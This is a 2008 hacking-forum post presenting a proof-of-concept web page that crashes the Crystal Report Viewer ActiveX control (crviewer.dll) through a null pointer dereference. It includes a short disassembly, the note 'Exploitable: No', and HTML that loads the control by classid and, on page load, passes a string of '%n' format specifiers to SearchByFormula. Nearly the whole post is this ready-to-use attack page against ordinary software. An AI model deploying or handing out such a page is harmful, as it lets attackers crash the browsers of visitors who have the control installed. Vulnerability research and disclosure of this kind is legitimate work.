escalation666 Posted July 11, 2008 Report Posted July 11, 2008 <html><--found and coded by:escalation666site:www.rstcenter.comRIP moubikCrystal Report Viewer Control crviewer.dll null pointer dereference Exploitable: NoRegKey Safe for Script: TrueRegKey Safe for Init: TrueDisassembly:600084AB PUSH ECX600084AC PUSH ECX600084AD PUSH ESI600084AE PUSH EDI600084AF MOV [EBP-10],ECX600084B2 MOV EAX,[EBP+8]600084B5 MOV ESI,[EAX+50] -> crashwhere eax: 00000000ebp: 00000000ebp+8: 00000000Poc:--><object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='test' /></object><head><script language='javascript'>function exploit(){var arg = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n";test.SearchByFormula(arg);}</script></head><body onload="javascript: return exploit();"></body></html> Quote